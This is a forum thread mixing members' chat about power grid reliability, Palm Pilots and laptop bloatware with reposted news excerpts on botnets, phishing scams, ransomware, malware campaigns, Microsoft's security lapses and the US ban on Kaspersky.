The General thread for Computers And Internet

#351

As I understood it, the smart grid wasn't just about circuit protection, but was about instantaneous adjustment of the entire national electrical grid based on changing conditions, and about who took the load when demand spiked. Back in 2008 when I read about it, they said that outages of electricity averaged many hours per year in the US, but in Japan and Europe it was just minutes. But maybe things have changed without me knowing. My home averages a lot of flickering power outages throughout every year, and they aren't lessening. I mean, I use UPSs and all, but power distribution is still an issue in this great land of ours.

#352

And if computer related businesses use up all the power available on the grid, what happens then?

I don't think we're at too much risk in NC, Virginia is the state with all the server farms and so forth, but I am interested in this stuff, even though my knowledge level is zero.

But can NC be affected by a national or regional outage, due to overuse of electricity by the computer companies?

Reality Check · #353

The grid control and protection system and related. The protective relays are like the front line in controlling the grid. In addition to the relays most stations now have other power monitors that all for real time power flow data, logging and other SCADA functions.

One issue with the US is there is not one big grid controlled from one central location. It is divided into regions that are interconnected but each region is controlled at a regional center. The strength of the interconnections varies. For example the grid in Texas is primarily controlled by ERCOT (Electrical Reliability Council of Texas). They have always maintained weak inter-ties with other regions somewhat based on the hubris that we do it better in Texas. This bit them in the ass a few years ago when a record cold snap froze up all their poorly protected generating plants and enough power could not be imported to maintain a stable grid.

Reality Check · #354

I think electric vehicles are a larger threat to the grid than bit miners. Replacing all that energy from gasoline fossil fuel with electrons from the grid is a big hunk to pick up.

RTH10260 · #355

Treasury Sanctions Creators of 911 S5 Proxy Botnet

May 28, 2024

The U.S. Department of the Treasury today unveiled sanctions against three Chinese nationals for allegedly operating 911 S5, an online anonymity service that for many years was the easiest and cheapest way to route one’s Web traffic through malware-infected computers around the globe. KrebsOnSecurity identified one of the three men in a July 2022 investigation into 911 S5, which was massively hacked and then closed ten days later.

The 911 S5 botnet-powered proxy service, circa July 2022.

From 2015 to July 2022, 911 S5 sold access to hundreds of thousands of Microsoft Windows computers daily, as “proxies” that allowed customers to route their Internet traffic through PCs in virtually any country or city around the globe — but predominantly in the United States.

911 built its proxy network mainly by offering “free” virtual private networking (VPN) services. 911’s VPN performed largely as advertised for the user — allowing them to surf the web anonymously — but it also quietly turned the user’s computer into a traffic relay for paying 911 S5 customers.

911 S5’s reliability and extremely low prices quickly made it one of the most popular services among denizens of the cybercrime underground, and the service became almost shorthand for connecting to that “last mile” of cybercrime. Namely, the ability to route one’s malicious traffic through a computer that is geographically close to the consumer whose stolen credit card is about to be used, or whose bank account is about to be emptied.

In July 2022, KrebsOnSecurity published a deep dive into 911 S5, which found the people operating this business had a history of encouraging the installation of their proxy malware by any means available. That included paying affiliates to distribute their proxy software by secretly bundling it with other software.

https://krebsonsecurity.com/2024/05/tre ... xy-botnet/

RTH10260 · #356

Surge in Discord Malware Attacks as 50,000 Malicious Links Uncovered

WAQAS
MAY 29, 2024

Cybersecurity researchers at Bitdefender have found a surge in malware and phishing attacks on Discord, noting 50,000 malicious links in the last six months, with US users being the most targeted.

In a recent six-month analysis, cybersecurity firm Bitdefender has uncovered a troubling trend: cybercriminals are using Discord, a popular communication platform, to distribute malware and execute phishing campaigns.

The report, shared with Hackread.com by Bitdefender ahead of publishing on Wednesday 29, 2024, highlights over 50,000 malicious links identified on Discord, showing the platform’s growing vulnerability to cyber threats.

Key Findings

Malware and Phishing Dominate: Malware and phishing links make up a combined 39% of the detected malicious links. These attacks often involve deceitful tactics to trick users into downloading harmful software or providing sensitive information.

US Users Most Targeted: Users in the United States are particularly at risk, accounting for 16.2% of the threats. This makes them the most targeted group by a significant margin. Other countries targeted through malicious campaigns through Discord include France, Romania, the United Kingdom, and Germany.

Fake Offers of Discord Nitro: A common scam involves fake offers of free Discord Nitro, a premium subscription service. Users are lured in by the promise of free upgrades, only to be targeted by phishing or malware attacks.

These findings should not come as a surprise, as Discord has a history of malicious activities. In February of last year, cyber criminals were found exploiting the platform to spread PureCrypter malware, which targeted government organizations and entities in North America and the Asia-Pacific region.

https://hackread.com/discord-malware-at ... ous-links/

RTH10260 · #357

Proofpoint exposes AFF scammers’ piano gambit
Ransomware and nation state actors dominate the headlines, but fraud and scams still net career cyber criminals thousands from unsuspecting members of the public. Proofpoint reports on a campaign targeting victims of a musical inclination

Alex Scroxton, Security Editor
Published: 29 May 2024 16:45

A phishing campaign targeting, of all things, people who might be interested in buying a second-hand piano, may have netted the scam operation behind it over $900,000, according to researchers at email security specialist Proofpoint.

The email campaign seems to have started in January 2024, and is ongoing. It forms the precursor to an advance fee fraud (AFF) scam, a type of fraud usually targeting private individuals, rather than organisations, in which victims are offered money, products or services, offered the opportunity to take advantage of an incredible deal that never materialises, or asked for help retrieving funds from another country.

Generally, victims will be baited with elaborate stories into making a small payment – or advance fee – to receive the promised goods or services. Needless to say, once the victim has paid up, nothing ever materialises.

They are generally run by financially motivated cyber criminals, and due to the fact so many of them seem to originate from Nigeria, are often known as 419 scams, after the relevant section of Nigerian law that deals with such matters.

They often exploit current concerns and events, which at first glance makes the use of such a specific lure somewhat unusual. However, wrote the Proofpoint team, comprising Tim Kromphardt and Selena Larson, there may be some specific targeting at play.

“Most of the messages target students and faculty at colleges and universities in North America, however other targeting of industries including healthcare and food and beverage services was also observed,” they wrote. “Proofpoint observed at least 125,000 messages so far this year associated with the piano scam campaigns cluster.

“In the campaigns, the threat actor purports to offer up a free piano, often due to alleged circumstances like a death in the family,” they continued. “When a target replies, the actor instructs them to contact a shipping company to arrange delivery. That contact address will also be a fake email managed by the same threat actor. The ‘shipping company’ then claims they will send the piano if the recipient sends them the money for shipping first.”

https://www.computerweekly.com/news/366 ... ano-gambit

RTH10260 · #358

about an incident that happened in October 2023

Mysterious Cyber Attack Took Down 600,000+ Routers in the U.S.

May 31, 2024
NewsroomNetwork Security / Cyber Attack

More than 600,000 small office/home office (SOHO) routers are estimated to have been bricked and taken offline following a destructive cyber attack staged by unidentified cyber actors, disrupting users' access to the internet.

The mysterious event, which took place between October 25 and 27, 2023, and impacted a single internet service provider (ISP) in the U.S., has been codenamed Pumpkin Eclipse by the Lumen Technologies Black Lotus Labs team. It specifically affected three router models issued by the ISP: ActionTec T3200, ActionTec T3260, and Sagemcom.

"The incident took place over a 72-hour period between October 25-27, rendered the infected devices permanently inoperable, and required a hardware-based replacement," the company said in a technical report.

The blackout is significant, not least because it led to the abrupt removal of 49% of all modems from the impacted ISP's autonomous system number (ASN) during the time-frame.

While the name of the ISP was not disclosed, evidence points to it being Windstream, which suffered an outage around the same time, causing users to report a "steady red light" being displayed by the impacted modems.

https://thehackernews.com/2024/05/myste ... -down.html

RTH10260 · #359

New York passes laws protecting kids from addictive social media content
Legislation will limit children’s exposure to computer algorithmic social media feeds and protect their privacy

Edward Helmore
Sat 8 Jun 2024 12.00 CEST

New York state took novel legislative steps on Friday to limit children’s exposure to computer algorithmic social media feeds, passing two laws to protect children from addictive social media content and to protect their privacy.

The Stop Addictive Feeds Exploitation (Safe) for Kids Act requires social media companies to restrict addictive feeds on their platforms for users under 18 unless parental consent is granted, and prohibits companies from sending notifications regarding addictive feeds to minors from 12.00am to 6.00am.

The second law, the New York Child Data Protection Act, prohibits online sites from collecting, using, sharing or selling personal data of anyone under the age of 18, unless they receive informed consent or unless doing so is necessary for the purpose of the website.

https://www.theguardian.com/us-news/art ... y-children

RTH10260 · #360

what's an "addictive feed"

tek · #361

RTH10260 wrote: ↑Sat Jun 08, 2024 8:59 am what's an "addictive feed"

Potato chips

RTH10260 · #362

Microsoft in damage-control mode, says it will prioritize security over AI
Microsoft CEO Satya Nadella is now personally responsible for security flaws.

ASHLEY BELANGER -
6/13/2024, 10:38 PM

Microsoft is pivoting its company culture to make security a top priority, President Brad Smith testified to Congress on Thursday, promising that security will be "more important even than the company’s work on artificial intelligence."

Satya Nadella, Microsoft's CEO, "has taken on the responsibility personally to serve as the senior executive with overall accountability for Microsoft’s security," Smith told Congress.

His testimony comes after Microsoft admitted that it could have taken steps to prevent two aggressive nation-state cyberattacks from China and Russia.

According to Microsoft whistleblower Andrew Harris, Microsoft spent years ignoring a vulnerability while he proposed fixes to the "security nightmare." Instead, Microsoft feared it might lose its government contract by warning about the bug and allegedly downplayed the problem, choosing profits over security, ProPublica reported.

This apparent negligence led to one of the largest cyberattacks in US history, and officials' sensitive data was compromised due to Microsoft's security failures. The China-linked hackers stole 60,000 US State Department emails, Reuters reported. And several federal agencies were hit, giving attackers access to sensitive government information, including data from the National Nuclear Security Administration and the National Institutes of Health, ProPublica reported. Even Microsoft itself was breached, with a Russian group accessing senior staff emails this year, including their "correspondence with government officials," Reuters reported.

"We acknowledge that we can and must do better," Smith told Congress today, according to his prepared written testimony. "As a company, we need to strive for perfection in protecting this nation’s cybersecurity. Any day we fall short is a bad day for cybersecurity and a terrible moment at Microsoft."

https://arstechnica.com/tech-policy/202 ... y-over-ai/

RTH10260 · #363

Background post on the mentioned security vulnerability

Microsoft Chose Profit Over Security and Left U.S. Government Vulnerable to Russian Hack, Whistleblower Says
Former employee says software giant dismissed his warnings about a critical flaw because it feared losing government business. Russian hackers later used the weakness to breach the National Nuclear Security Administration, among others.

by Renee Dudley, with research by Doris Burke
June 13, 5 a.m. EDT

Microsoft hired Andrew Harris for his extraordinary skill in keeping hackers out of the nation’s most sensitive computer networks. In 2016, Harris was hard at work on a mystifying incident in which intruders had somehow penetrated a major U.S. tech company.

The breach troubled Harris for two reasons. First, it involved the company’s cloud — a virtual storehouse typically containing an organization’s most sensitive data. Second, the attackers had pulled it off in a way that left little trace.

https://www.propublica.org/article/micr ... an-hackers

#364

So I've been emptying boxes of wires and wall warts, spreading 'em out on the floor to figure out what is what and what is going to the recyclers.

I 'just' (3 hours ago) got distracted - I found the cables for my old Palm Pilots. I think I got a 3 and a 5. I'm staring at the 3 but I got the Pilot 5 connected and hot synching with Windows 11. Works great.

But I'm synching to the Palm Desktop, synching to Outlook365 is an adventure for another day.
Also Not connecting to the WWW - the old WiFi would be too dangerous, but I might try the bluetooth option.

I'm just wondering what I'll use it for...

Edit: OK, what I thought was a Pilot III (3) is the Pilot V (5) - the battery appears to be dead. It works great on the charging stand, but loses everything when removed.
What I thought was the Pilot V is the Pilot Tx. And it works great and is even in pretty colors.

#365

SWMBO just got a new laptop for her birthday. Its nice, she mostly picked it out for herself, with very little nagging from me.

Its a midrange (I guess) MSI 'gaming' (she doesn't do gaming) machine with an Intel I5 cpu. I think its a pretty good machine for her.

So I'm setting it up. Made the mistake of using an existing Microsoft Account so it fires up with my name on the front screen instead of hers.

I ran BelArc Advisor to see what bloatware was there. Norton 360 of course - N360 requires a completely different removal tool than 'plain' Norton. Make sure you get the right one. They are both named 'NRnR' or something like that. (I found N360 on MY desktop too, I had used the wrong removal tool after the rebuild)

Installed AVG and IOBit Uninstaller. IOBit asked me to review installed programs and delete unneeded ones. It found a couple that I didn't see on BelArc.

- Killer Performance Driver Suite for Windows (had to look it up - its some kind of network drivers that override the Microsoft drivers supposedly for gamers, but slowdown network performance for non-gamer experience - fuck that.

- Tobii Experience Software For Windows - eyetracking software for gamers - fuck that too.

[whinge]
I SHOULDN'T HAVE TO LOOK UP THIS STUFF TO FIND OUT WHAT IT IS FOR AND IF I NEED IT OR NOT.

ALL BLOATWARE SHOULD BE DESCRIBED IN FULL IN THE LITERATURE THAT COMES WITH THE MACHINE.
[/whinge]

RTH10260 · #366

US bans sales of Kaspersky antivirus software over Russia ties
Washington says Moscow’s influence over company poses significant risk, as Kaspersky argues its activities do not threaten US security

Agence France-Presse
Fri 21 Jun 2024 04.42 CEST

Joe Biden’s administration has banned Russia-based cybersecurity firm Kaspersky from providing its popular antivirus products in the US over national security concerns.

“Kaspersky will generally no longer be able to, among other activities, sell its software within the United States or provide updates to software already in use,” said a commerce department statement. The announcement came after a lengthy investigation found Kaspersky’s “continued operations in the United States presented a national security risk due to the Russian government’s offensive cyber capabilities and capacity to influence or direct Kaspersky’s operations”.

The US commerce secretary, Gina Raimondo, said: “Russia has shown time and again they have the capability and intent to exploit Russian companies, like Kaspersky Lab, to collect and weaponise sensitive US information.”

https://www.theguardian.com/us-news/art ... ussia-ties

#367

Russian software on a Chinese made computer. Hmm ....

RTH10260 · #368

Wells Fargo Fires Employees Over "Mouse Jigglers"

BY TYLER DURDEN
FRIDAY, JUN 14, 2024 - 11:44 AM

In the era of hybrid work, with employees splitting their time between two days in the office and three days working remotely, employers have ramped up using productivity monitoring software. However, employees have outsmarted some of these surveillance programs with gadgets like mouse movers, otherwise known as 'mouse jigglers.'

The popularity of mouse jigglers has exploded on TikTok in the last several years. Firms have been cracking down on these devices following a surge in fake work activity, which has weighed on productivity.

Wells Fargo, in a new disclosure with the Financial Industry Regulatory Authority, first reported by Bloomberg, had terminated over a dozen employees in its wealth- and investment-management unit for their use of mouse jigglers.

They were "discharged after review of allegations involving simulation of keyboard activity creating the impression of active work," according to the disclosures.

On Amazon, some of the top-ranking mouse jigglers sold have thousands of reviews and range in price between $6 and $25.

https://www.zerohedge.com/technology/we ... e-jigglers

RTH10260 · #369

Fake Google Chrome errors trick you into running malicious PowerShell scripts

By Bill Toulas
June 17, 2024 06:31 PM 3

A new malware distribution campaign uses fake Google Chrome, Word, and OneDrive errors to trick users into running malicious PowerShell "fixes" that install malware.

The new campaign was observed being used by multiple threat actors, including those behind ClearFake, a new attack cluster called ClickFix, and the TA571 threat actor, known for operating as a spam distributor that sends large volumes of email, leading to malware and ransomware infections.

Previous ClearFake attacks utilize website overlays that prompt visitors to install a fake browser update that installs malware.

Threat actors also utilize JavaScript in HTML attachments and compromised websites in the new attacks. However, now the overlays display fake Google Chrome, Microsoft Word, and OneDrive errors.

These errors prompt the visitor to click a button to copy a PowerShell "fix" into the clipboard and then paste and run it in a Run: dialog or PowerShell prompt.

"Although the attack chain requires significant user interaction to be successful, the social engineering is clever enough to present someone with what looks like a real problem and solution simultaneously, which may prompt a user to take action without considering the risk," warns a new report from ProofPoint.

The payloads seen by Proofpoint include DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard hijacker, and Lumma Stealer.

https://www.bleepingcomputer.com/news/s ... l-scripts/

RTH10260 · #370

An intersting article into a corporate being hacked, the detection and removal, and a flareup of the nacsty stuff. How legacy servers are dangerous, and how you must not just kill a fledgling project, but have them remove all traces from the systems.

China's 'Velvet Ant' APT Nests Inside Multiyear Espionage Effort
The campaign is especially notable for the remarkable lengths to which the threat actor went to maintain persistence on the target environment.

Jai Vijayan, Contributing Writer
June 17, 2024

Researchers have uncovered a quiet multiyear campaign by China's Velvet Ant cyber-espionage group to steal critical data from a large company in East Asia.

What makes the campaign noteworthy is the extent to which the threat actor managed to maintain persistence on the victim's network despite repeated eradication attempts.

Researchers from Sygnia who finally booted the threat actor out of the organization's environment attributed at least part of Velvet Ant's persistence to its success at finding and infecting numerous legacy and unmonitored systems on the target network.

https://www.darkreading.com/cyberattack ... -espionage

#371

My Google Fiber is showing the following:

Ping: 2 ms
Jitter: 0 ms
Download: 947.9 mbps
Upload: 949.0 mbps

Room for improvement on that download speed

and I gotta get a new Range Extender, because this one won't connect to the network.

Then some idiot in an Amazon truck comes along and cuts our cable ...

RTH10260 · #372

Many Passwords Can Be Cracked in Under an Hour, Study Finds
If your passwords are simple, you might be at risk.

Saturday, June 22, 2024

If you're not using strong, random passwords, your accounts might be more vulnerable than you think. A recent study by cybersecurity firm Kaspersky shows that a lot of passwords can be cracked in less than an hour due to advancements in computer processing power.

Kaspersky's research team used a massive database of 193 million passwords from the dark web. These passwords were hashed and salted, meaning they were somewhat protected, but still needed to be guessed. Using a powerful Nvidia RTX 4090 GPU, the researchers tested how quickly different algorithms could crack these passwords.

The results are alarming: simple eight-character passwords, made up of same-case letters and digits, could be cracked in as little as 17 seconds. Overall, they managed to crack 59% of the passwords in the database within an hour.

The team tried several methods, including the popular brute force attack, which attempts every possible combination of characters. While brute force is less effective for longer and more complex passwords, it still easily cracked many short, simple ones. They improved on brute force by incorporating common character patterns, words, names, dates, and sequences.

With the best algorithm, they guessed 45% of passwords in under a minute, 59% within an hour, and 73% within a month. Only 23% of passwords would take longer than a year to crack.

To protect your accounts, Kaspersky recommends using random, computer-generated passwords and avoiding obvious choices like words, names, or dates. They also suggest checking if your passwords have been compromised on sites like HaveIBeenPwned? and using unique passwords for different websites.

This research serves as a reminder of the importance of strong passwords in today's digital world. By taking these steps, you can significantly improve your online security and keep your accounts safe from hackers.

https://www.cysecurity.news/2024/06/man ... under.html

RTH10260 · #373

Red Tape Is Making Hospital Ransomware Attacks Worse
With cyberattacks increasingly targeting health care providers, an arduous bureaucratic process meant to address legal risk is keeping hospitals offline longer, potentially risking lives.

Crippling ransomware attacks against hospitals and health care providers are on the rise. These ruthless cyberattacks can take medical systems offline for weeks—canceling appointments and surgeries and causing harm to patients. Doctors and nurses are plunged into crisis situations where they resort to using pen and paper, while IT staff work to make systems safe and bring them back online. The recovery can be long-lasting and brutal.

Health care professionals, lawyers, and cybersecurity experts tell WIRED that amid the chaos caused by criminal hackers, a little-known bureaucratic process can slow down hospitals and medical providers getting their systems working again.

The red tape involves organizations hit by ransomware sending detailed “assurance” or “attestation” letters to companies that they connect their systems or software with. These letters are designed to convince organizations that it is safe to reconnect after the ransomware attack, but they can add extra pressure to those already dealing with physically and mentally draining recovery operations.

The letters aren’t required by any law and are not unique to medical organizations impacted by ransomware attacks, but experts say in situations where lives are at risk, more efficient processes should be considered. Assurance letters seen by WIRED contain up to 40 individual questions about cyberattacks and include detailed requests about how events unfolded, steps taken to respond, and any evidence that may have been gathered.

“Negotiating with hundreds of vendors each with their own unique set of requirements to reconnect was an arduous and time-consuming process,” says Sean Fitzpatrick, the vice president of external communications at Ascension, a network of 140 hospitals and thousands of affiliated providers across 19 states, which was hit by ransomware in May. Ascension now has more than 95 percent of its suppliers reconnected or in the process of reconnecting, Fitzpatrick says, and has attempted to be as transparent as possible with its recovery.

https://www.wired.com/story/ransomware- ... e-letters/

RTH10260 · #374

Widespread Use of Rafel RAT Puts 3.9 Billion Android Devices at Risk
The new Rafel RAT is an Android malware capable of stealing data, spy on you, and even lock your phone. Keep your Android updated, download apps safely, and avoid phishing attacks to stay secure.

DEEBA AHMED
JUNE 24, 2024

In its latest research report, Check Point Research (CPR) reveals that multiple threat actors are using Rafel, a powerful open-source remote access trojan (RAT), targeting Android devices for espionage and covert intelligence operations. What’s worse: There are over 3.9 billion Android devices exposed to this threat.

One of the adversaries exploiting this RAT is APT-C-35 / DoNot Team, which used Rafel RAT for covert operations, benefiting from its remote access, surveillance, data exfiltration, and persistence mechanisms.

The DoNot Team is known for targeting Android devices. In November 2020, the group targeted Google Firebase cloud messaging to spread Android malware. In October 2021, Amnesty International blamed the DoNot Team for a malware attack against Togolese activists, attributing the attack to the Indian cybersecurity firm Innefu Labs after identifying one of the IP addresses used in the attack.

As for the latest attack, CPR collected multiple malware samples and identified 120 command and control servers. Surprisingly, Samsung phones were the most impacted devices and the US, China, and Indonesia were the most targeted countries.

“The majority of victims had Samsung phones, with Xiaomi, Vivo, and Huawei users comprising the second-largest group among the targeted victims,” CPR’s report read.

This could be due to the sheer popularity of these brands, making them a wider target base for attackers.

Over 87% of affected victims were running outdated Android versions that no longer receive security updates. These outdated systems lack critical security patches, making them easier targets for malware exploitation. Most impacted are Android 11 users, followed by Android versions 8 and 5 users.

https://hackread.com/rafel-rat-puts-3-9 ... s-at-risk/